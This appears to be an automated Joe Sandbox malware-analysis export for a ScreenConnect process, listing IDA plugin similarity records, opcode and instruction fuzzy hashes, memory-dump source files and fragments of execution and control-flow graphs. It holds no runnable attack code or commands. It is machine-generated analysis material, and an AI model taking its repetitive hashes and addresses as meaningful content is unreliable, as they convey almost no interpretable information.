                                                                                                                                                                                                                                                                    • Opcode ID: 9c647c9c32868dc47efbc9d8272ceccc62eb8a5bc0171a5312393f4ff219b868
                                                                                                                                                                                                                                                                    • Instruction ID: 3b256dd2507a455eabbafd491b05d079cb0cf394b607c364acdc986874e0cd72
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c647c9c32868dc47efbc9d8272ceccc62eb8a5bc0171a5312393f4ff219b868
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F021D671908A1C9FDB58DF58C449BF9BBE0FB65321F00422ED04ED3651DB71A856CB90
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: t*;u$t*;u
                                                                                                                                                                                                                                                                    • API String ID: 0-727745153
                                                                                                                                                                                                                                                                    • Opcode ID: 06a6779a26b32fa90728084ddd81dff57a64e0c32ceb9ecdda1ec93358af3509
                                                                                                                                                                                                                                                                    • Instruction ID: 5e1d12e918c8d18ef3988c95be3f303ec7eee328e25db1f8a45767c28bfb8592
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a6779a26b32fa90728084ddd81dff57a64e0c32ceb9ecdda1ec93358af3509
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1911A171F00205AFEB64CEA9DC40AAFB7F6BFC8610F54C565E584D7260E77299028B90
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: $q$$q
                                                                                                                                                                                                                                                                    • API String ID: 0-3126353813
                                                                                                                                                                                                                                                                    • Opcode ID: 4f6ce1ac6eef309a5c54ebd9f2c74bf53ae14963c89b226e285df4153e3f611a
                                                                                                                                                                                                                                                                    • Instruction ID: d3e7c172072086b8d76f5fc2eb621f40bba13b3357f41d33d4b1148abec0aa64
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f6ce1ac6eef309a5c54ebd9f2c74bf53ae14963c89b226e285df4153e3f611a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC014934A00304CFE7259B75E40C6267BF6FF45611B1640EBE885CB226DB35DC02CB41
Strings
Memory Dump Source
• Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    • Instruction ID: aacef08e3b78c110bb382f106f3746020112f63a040bf66969001036c5e66590
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9d602a4086cd6591db947955bd3548df3c3348ba2a2af3db94fc26d9a2ba568
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7512A386007018FD734CF69D494A56B7F2FF8D624B544A5CE49ACB7A4DB71E802CB44
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a8a1fa27ac6b257cefa7156a7ee49027e9015d7b04b646506f6c414a569b61cd
                                                                                                                                                                                                                                                                    • Instruction ID: 13ec95b6932094dca41c767e67c96fb8103e451dc5d8000efae021b008da6547
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8a1fa27ac6b257cefa7156a7ee49027e9015d7b04b646506f6c414a569b61cd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69414A74A007068FDB74CF79D84469EBBF1FF48710B108A68E496DB6A4EB30E845CB90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f1f0967650d85f7c1d16a0b1f2793a3217a9829f6c90d4e81ad730cdbf30d126
                                                                                                                                                                                                                                                                    • Instruction ID: c36012090b3d10d1572190a02d893440b6aeb8910084a8a6cf8d03eb40cfb763
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1f0967650d85f7c1d16a0b1f2793a3217a9829f6c90d4e81ad730cdbf30d126
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA414A74A00706CFDB74CF69D44469ABBF1FF48710B148A68E496DB6A4EB31E845CB90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: fcaa3c20119d155bd3408c8c48315da11299b115aa17b3279ce01a8fbddde6c3
                                                                                                                                                                                                                                                                    • Instruction ID: 7dcaa77b201d8f9a385df892e6016f188c1995f8a2b169f58a1e95749b3f1ba8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcaa3c20119d155bd3408c8c48315da11299b115aa17b3279ce01a8fbddde6c3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55318D31B002058FEB24DFA9C4946AFF7F5EF8A354F10946AE50AEB690DB309C018B90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 96c1fa66792f793ff12c4b1e66ddf4f04fc19af04752a4f9d940386399b60beb
                                                                                                                                                                                                                                                                    • Instruction ID: fc76d388b457ef01235e7d4d0b612246ef50b766141e0b202b0c94655b782f84
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96c1fa66792f793ff12c4b1e66ddf4f04fc19af04752a4f9d940386399b60beb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B631AFABC153519BE3215E78CE5B3847EE0CFB3018B1C4256C688E5E4AE75CE2048796
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8b6e20490f5ab14a686b2d5494250cac7d870d68682e2e5a360fe6645edc7de9
                                                                                                                                                                                                                                                                    • Instruction ID: cec2920ce9ee12a76114597bfce7ca48d0852a07e31b1bd38952cf35cf142411
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b6e20490f5ab14a686b2d5494250cac7d870d68682e2e5a360fe6645edc7de9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2931EE70F042068FDB14DBA8D8546AEFBB6FFC9210B1481AAD949EF380DA309D02C791
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: c7a9a2e60782f7e1db3c686929c494688098c1b6543083f6f7ec3f41a2b983c2
                                                                                                                                                                                                                                                                    • Instruction ID: 1e5b0212faba3ff901a3fa41a1c396802726c335e361335c4490f6b14f2e9ea7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7a9a2e60782f7e1db3c686929c494688098c1b6543083f6f7ec3f41a2b983c2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65314934A007018FD770CF69D884A6AB7F2FF89720B544A6CE496CB7A5D731E805CB91
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8b149d11c15b939ed2fbec5f60dfb00e9425044da18ee70f551f1338016a6750
                                                                                                                                                                                                                                                                    • Instruction ID: a7102cd46975061574457795ed4edc7a626b0e39350abccd1a00a6167ab363b3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b149d11c15b939ed2fbec5f60dfb00e9425044da18ee70f551f1338016a6750
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0316B31E00219DFCF14DFA8E8809CDBBB6FF89305B10842AE5057B260DB35A906CBA0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 3cebf8fbca9a40d3a3ae6655075ed3f532bd03f8f3e6bfdd561bf9cd4d330c1c
                                                                                                                                                                                                                                                                    • Instruction ID: ca818c31e6c64f53cade56b1792fef44fcf76ef87c41db495bd48a964edfd029
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cebf8fbca9a40d3a3ae6655075ed3f532bd03f8f3e6bfdd561bf9cd4d330c1c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F11A279B002515BD724EB78E8907AE7BF2FBC5210F449629E449AF390DF70AD0687E1
Memory Dump Source
• Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
Memory Dump Source
• Source File: 00000008.00000002.1566169410.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_104d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 352cd6480b62208405f9bd97941c7393d8342396528f4d64e71629cb8c9365bf
                                                                                                                                                                                                                                                                    • Instruction ID: 67e60aa2d98f01bd7b7c04ab31acecd2e1ee687eb7f8e7361a6c8fb649ad641b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 352cd6480b62208405f9bd97941c7393d8342396528f4d64e71629cb8c9365bf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD018CB140D3C09FD7124B258C94752BFA8EF53224F0981DBE9888F2A3C2695C45CB72
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566169410.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_104d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a8c5033a390279468bfc1313e965d0af3a63b048e529b80f641208a2918902dd
                                                                                                                                                                                                                                                                    • Instruction ID: d0b3f8950dbab0a681be7a9c918e8695e4a24b2f1b6f8abf822e1ef21081b011
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8c5033a390279468bfc1313e965d0af3a63b048e529b80f641208a2918902dd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDE0D831300314A757251A9AA49D12FBEDEEBC9621754413DF649CB340CE719C058394
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0426c11afbda087341dbf2f4801d01f8395665d40b978e639fe01a9e406e9baa
                                                                                                                                                                                                                                                                    • Instruction ID: 1a88ce195df78aca42f2323d6685a1babf585faab11053fbf1534d149c21daca
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0426c11afbda087341dbf2f4801d01f8395665d40b978e639fe01a9e406e9baa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6E0A9392003149BE724AB69A44812A7BEAEBC8222B00423AE486C7284DF759C01CBA0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 43bec4dfb92d61183b07551e339eb4b4bb05479b87e2737173980653c308f930
                                                                                                                                                                                                                                                                    • Instruction ID: 673f1f819b0ec63f6d0c83ade7df35eefad652bcbfef257fb0a89577afdf2475
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43bec4dfb92d61183b07551e339eb4b4bb05479b87e2737173980653c308f930
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CE0DF31300314A797251A9AA49C12FBADEEBC8621744803DF60ACB340CE729C0683A0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a50d55377a03fb4af176df2e81b565d05ccdb62856b4a4f3e0394ac8de326931
                                                                                                                                                                                                                                                                    • Instruction ID: 60bfebad816edee19cad853cd8834dcc9eab4a1867205b43e9c73891bfce15e5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a50d55377a03fb4af176df2e81b565d05ccdb62856b4a4f3e0394ac8de326931
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DE08C33B014529B8B5081DC9C45695B7CEAB892A4BBD86B1FAA9CF381FA31DC024381
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: e508743d87804212930f6ad6a76423103a86a869bb73cb1029ad22253d2ff841
                                                                                                                                                                                                                                                                    • Instruction ID: 1e02a880b260fd7bee70af1866927496a14cad5b2c2d8f4efa8b0476d628f449
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e508743d87804212930f6ad6a76423103a86a869bb73cb1029ad22253d2ff841
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36E08639300318575318667DE55C45F7FEEEBC92613144125F556C73C4CE759C01C7A0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 049dcb14592576d0ca4dc8c865a8c88d248c0813d02bd15a0a3c8faf37f9cef3
                                                                                                                                                                                                                                                                    • Instruction ID: a1ab13ba6eccdf76d4f934bd037cfa1af602fbbb33b449fd946225050ccfa4b0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 049dcb14592576d0ca4dc8c865a8c88d248c0813d02bd15a0a3c8faf37f9cef3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FE04FB8901218EFD714EFB4E9956AD77F8E705205F105279E809DB250EB705E01CB91
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0d587ce6f3eaad27d11a935ac09a10bf1ef5154aadd37a25ecaf1f53e7019d59
                                                                                                                                                                                                                                                                    • Instruction ID: 83d3aa6e9aa6f27a0bd4ff2ef7c76c03c63835599d22b94c441c66d1ab363605
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d587ce6f3eaad27d11a935ac09a10bf1ef5154aadd37a25ecaf1f53e7019d59
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7E04F30901208FFDB50DFB5E94169E77F9EB45210F1046AAD844D7200DE362E41AB45
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 3fc4052f42b92377679cc8dad30167337679a5c679b9751a6b50980aca547e80

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:9.8%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                    Signature Coverage:100%
                                                                                                                                                                                                                                                                    Total number of Nodes:5
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                    execution_graph 14513 14e4c64 14515 14e4c90 14513->14515 14514 14e4cc6 14515->14514 14516 14e4d1d RtlGetVersion 14515->14516 14517 14e4dda 14516->14517

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    control_flow_graph 0 14e4c64-14e4cb3 5 14e4cb5-14e4cc4 call 14e4848 0->5 6 14e4d02-14e4d08 0->6 9 14e4d09-14e4dd8 RtlGetVersion 5->9 10 14e4cc6-14e4ccb 5->10 15 14e4dda-14e4de0 9->15 16 14e4de1-14e4e24 9->16 22 14e4cce call 14e52e8 10->22 23 14e4cce call 14e52f8 10->23 11 14e4cd4 11->6 15->16 20 14e4e2b-14e4e32 16->20 21 14e4e26 16->21 21->20 22->11 23->11
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlGetVersion.NTDLL(0000009C), ref: 014E4DBE
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3157748964.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_14e0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                                                                                                    • String ID: `Qq$`Qq
                                                                                                                                                                                                                                                                    • API String ID: 1889659487-3032102428

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    control_flow_graph 423 59b0948-59b098e 424 59b09b2-59b09bf 423->424 425 59b0990-59b09ac 423->425 426 59b09da-59b09e7 424->426 427 59b09c1-59b09d4 424->427 425->424 428 59b0e1d-59b0ede 426->428 429 59b09ed-59b09fa 426->429 427->426 433 59b0f0a-59b0f67 427->433 490 59b0ee6-59b0f09 428->490 429->428 432 59b0a00-59b0a15 429->432 434 59b0a1b-59b0a6a 432->434 435 59b0bc3-59b0c3d 432->435 434->435 447 59b0a70-59b0ad9 434->447 445 59b0c3f-59b0c63 435->445 446 59b0c7d-59b0c8e 435->446 449 59b0c94-59b0d53 445->449 446->449 475 59b0b0b-59b0bb2 447->475 476 59b0adb-59b0b09 447->476 465 59b0d67-59b0d7e 449->465 466 59b0d55-59b0d61 449->466 468 59b0dba-59b0e1c 465->468 469 59b0d80-59b0db8 465->469 466->465 469->468 486 59b0bc0-59b0bc1 475->486 487 59b0bb4 475->487 476->475 486->435 487->486
                                                                                                                                                                                                                                                                    • Instruction ID: 143b6cfd29ba964292bec3e937835ed0958abd1fa2e292db5d4f879db6e47da4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e77bd24d74e96715a2098d75a450cc1ece3b44d35d268f4350cb1b841a61b12
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521F1B1504204EFDF59DF54E9C0B26BFA6FB88314F208569ED090B256C336D456CBB2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0252c4b3fa9bdde0890e22b9719536d7b7e3eff305e2c3c542b70e4d3e0a114c
                                                                                                                                                                                                                                                                    • Instruction ID: ff35d2701e88eac87fd8da06e14f6e293b66107daf2d2cc9c6a090dff3a7d381
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0252c4b3fa9bdde0890e22b9719536d7b7e3eff305e2c3c542b70e4d3e0a114c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8115B32B093608FDB228F3898989CE3FB5FF9621031941ABE845CB262C6649C05C790
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3156448652.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_115d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                                                                                                                                                                                                    • Instruction ID: 608bb0943080addb0c5b50cdd9b6f38debd829a2a82cbac1b1f0c743b60a8f6c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A811AF76504284CFCF16CF54E9C4B16BF62FB84314F2486A9DD090B657C336D45ACBA2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3156448652.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_115d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d7e48843903b0f04140ed8e154ea7a4b1d605ec4d3d77c05429f5388a588c194
                                                                                                                                                                                                                                                                    • Instruction ID: 74d143437252de5952e4b9a899cce104f82e810267fcea259cced4fa1b6025e7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e48843903b0f04140ed8e154ea7a4b1d605ec4d3d77c05429f5388a588c194
